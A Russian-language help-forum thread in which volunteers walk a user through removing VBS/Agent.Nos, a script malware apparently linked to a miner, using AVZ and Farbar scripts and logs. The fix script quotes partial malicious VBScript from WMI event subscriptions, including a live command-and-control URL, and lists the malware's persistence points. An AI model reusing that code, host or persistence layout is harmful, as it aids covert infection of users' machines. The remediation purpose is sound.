Перейти к содержанию

[РЕШЕНО] VBS/Agent.Nos


Рекомендуемые сообщения

Получил его после открытия ярлыка на флешке. Nod 32 по кругу его удаляет а он всё восстанавливается и DR.Web выдаёт ошибку на разных этапах сканирования .Вроде систему не грузит но само его наличие напрягает.Подскажите как его удалить,спасибо.

 

https://ibb.co/7vhjyDF

CollectionLog-2019.05.22-21.47.zip

Изменено пользователем Korlate
Ссылка на сообщение
Поделиться на другие сайты

Здравствуйте.

 

Выполните скрипт в AVZ из папки Autologger

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\Korlate\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs','');
 DeleteFile('C:\Users\Korlate\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.
  • Обратите внимание: будет выполнена перезагрузка компьютера.
Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.
c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678

Полученный после загрузки ответ сообщите здесь.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

Ссылка на сообщение
Поделиться на другие сайты

Всё сделал

Забыл сказать что он так же носил название myminer.exe и открывался под wsscript.eхe.Но после чистки файлов через реестр,process hacker и Malwarebytes вроде исчез но vbs/agent.nos остался.Не уверен связаны ли они вместе или нет.

CollectionLog-2019.05.22-22.14.zip

Изменено пользователем Korlate
Ссылка на сообщение
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3munStB.png

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

Ссылка на сообщение
Поделиться на другие сайты

1. Выделите следующий код:

Start::
CreateRestorePoint:
C:\Users\Korlate\AppData\Local\Temp\rknrl.vbs
HKLM\...\Run: [winstart] => wscript.exe //B "C:\Users\Korlate\AppData\Local\Temp\rknrl.vbs" <==== ATTENTION
Startup: C:\Users\Korlate\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs [2019-05-23] () [File not signed]
S2 MsRkNrL; %systemroot%\system32\wscript.exe //B "C:\autoexec.vbs" [X]
2019-05-22 21:58 - 2019-05-23 07:36 - 000000000 ___SH C:\autoexec.vbs
2019-05-19 18:16 - 2019-05-19 18:18 - 000182730 ____H C:\Users\Korlate\Desktop\~WRL0980.tmp
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"rknrl_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"rknrl_filter\"::
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"rknrlmon_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"rknrl_filter\"::
WMI:subscription\__TimerInstruction->rknrl_itimer::
WMI:subscription\__IntervalTimerInstruction->rknrl_itimer::
WMI:subscription\__EventFilter->rknrl_filter::[Query => select * from __timerevent where timerid="rknrl_itimer"]
WMI:subscription\ActiveScriptEventConsumer->rknrlmon_consumer::[ScriptText => On Error Resume Next:Dim wShell,Fso,mHttp,Wmi:Set wShell = CreateObject("WScript.shell"):host="http://a002.aigoingtokill.club/ctrl/playback.php":Set Fso = CreateObject("scripting.filesystemobject"):Set mHttp = CreateObject("msxml2.xmlhttp"):Set Wmi=GetObject("winmgmts:\\.\root\cimv2"):Set Tsk=Wmi.ex (the data entry has 6931 more characters).]
WMI:subscription\ActiveScriptEventConsumer->rknrl_consumer::[ScriptText => On Error Resume Next:Dim Fso,shellobj,objFile,Wmi,regPath,startPath:Set shellobj = CreateObject("WScript.Shell"):Set FSO = CreateObject("Scripting.Filesystemobject"):Set Wmi=getobject("winmgmts:\\.\root\cimv2"):set Wpro=Wmi.execquery("select * from win32_process where name='wscript.exe'"):regPath =  (the data entry has 124886 more characters).]
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} =>  -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} =>  -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} =>  -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} =>  -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} =>  -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} =>  -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} =>  -> No File
Folder: C:\Users\Korlate\AppData\Roaming\rootnuko
Reboot:
End::
2. Скопируйте выделенный текст (правая кнопка мышиКопировать).

3. Запустите Farbar Recovery Scan Tool.

4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.
Ссылка на сообщение
Поделиться на другие сайты

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.

  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10);
  • Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
  • Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
  • Процитируйте содержимое файла в своем следующем сообщении.
Ссылка на сообщение
Поделиться на другие сайты

SecurityCheck by glax24 & Severnyj v.1.4.0.53 [27.10.17]
WebSite: www.safezone.cc
DateLog: 23.05.2019 20:50:20
Path starting: C:\Users\Korlate\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe
Log directory: C:\SecurityCheck\
IsAdmin: True
User: Korlate
VersionXML: 6.44is-21.05.2019
___________________________________________________________________________

Windows 7(6.1.7601) Service Pack 1 (x64) Ultimate Lang: Russian(0419)
Дата установки ОС: 25.11.2018 11:30:06
Статус лицензии: Windows® 7, Ultimate edition Постоянная активация прошла успешно.
Режим загрузки: Normal
Браузер по умолчанию: C:\Program Files\Mozilla Firefox\firefox.exe
Системный диск: C: ФС: [NTFS] Емкость: [49.9 Гб] Занято: [31.2 Гб] Свободно: [18.7 Гб]
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.0.9600.17843 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено (-1)
Центр обновления Windows (wuauserv) - Служба работает
Центр обеспечения безопасности (wscsvc) - Служба работает
Удаленный реестр (RemoteRegistry) - Служба остановлена
Обнаружение SSDP (SSDPSRV) - Служба работает
Службы удаленных рабочих столов (TermService) - Служба остановлена
Служба удаленного управления Windows (WS-Management) (WinRM) - Служба остановлена
------------------------------- [ HotFix ] --------------------------------
HotFix KB3020369 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499164 Внимание! Скачать обновления
------------------------------ [ MS Office ] ------------------------------
Microsoft Office 2013 x64 v.15.0.4569.1506
---------------------------- [ Antivirus_WMI ] ----------------------------
ESET Security (выключен и устарел)
--------------------------- [ FirewallWindows ] ---------------------------
Брандмауэр Windows (MpsSvc) - Служба работает
--------------------------- [ AntiSpyware_WMI ] ---------------------------
ESET Security (выключен и устарел)
Windows Defender (выключен и устарел)
---------------------- [ AntiVirusFirewallInstall ] -----------------------
ESET Security v.12.1.34.0
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft .NET Framework 4.5.2 v.4.5.51209 Внимание! Скачать обновления
Steam v.2.10.91.91
Ghostscript GPL 8.64 (Msi Setup) v.8.64 Внимание! Скачать обновления
^Удалите старую версию, скачайте и установите новую.^
-------------------------------- [ Arch ] ---------------------------------
WinRAR 5.50 (64-разрядная) v.5.50.0 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.1.8.2 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox 66.0.5 (x64 ru) v.66.0.5 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Firefox!^
------------------ [ AntivirusFirewallProcessServices ] -------------------
C:\Program Files\ESET\ESET Security\egui.exe v.10.7.79.0
C:\Program Files\ESET\ESET Security\eguiProxy.exe v.10.7.79.0
ESET Service (ekrn) - Служба работает
C:\Program Files\ESET\ESET Security\ekrn.exe v.10.7.79.0
ESET Firewall Helper (ekrnEpfw) - Служба работает
C:\Program Files\ESET\ESET Security\ekrn.exe v.10.7.79.0
Защитник Windows (WinDefend) - Служба остановлена
----------------------------- [ End of Log ] ------------------------------

 

 

 

Ссылка на сообщение
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.
×
×
  • Создать...